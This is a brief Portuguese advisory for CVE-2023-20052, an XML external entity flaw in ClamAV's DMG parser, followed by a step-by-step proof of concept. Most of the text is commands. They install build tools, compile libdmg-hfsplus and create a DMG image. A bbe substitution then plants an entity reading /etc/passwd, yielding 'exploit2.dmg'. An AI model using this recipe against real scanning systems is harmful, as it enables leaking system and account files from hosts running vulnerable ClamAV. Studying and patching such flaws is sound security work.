
CVE-2023-20052 – vulnerabilidade de vazamento de informações no parser de arquivos DMG do ClamAV
Vulnerabilidade de vazamento de informações CVE-2023-20052 no analisador de arquivos DMG do ClamAV
Uma vulnerabilidade no analisador de arquivos DMG do ClamAV versões 1.0.0 e anteriores, 0.105.1 e anteriores, e 0.103.7 e anteriores poderia permitir que um atacante remoto não autenticado acessasse informações confidenciais em um dispositivo afetado. Essa vulnerabilidade se deve à habilitação da substituição de entidades XML, que pode resultar em injeção de entidade externa XML. Um atacante poderia explorar essa vulnerabilidade enviando um arquivo DMG malicioso para ser verificado pelo ClamAV em um dispositivo afetado. Uma exploração bem-sucedida poderia permitir que o atacante vazasse bytes de qualquer arquivo que pudesse ser lido pelo processo de verificação do ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg


Referência: https://github.com/nokn0wthing/CVE-2023-20052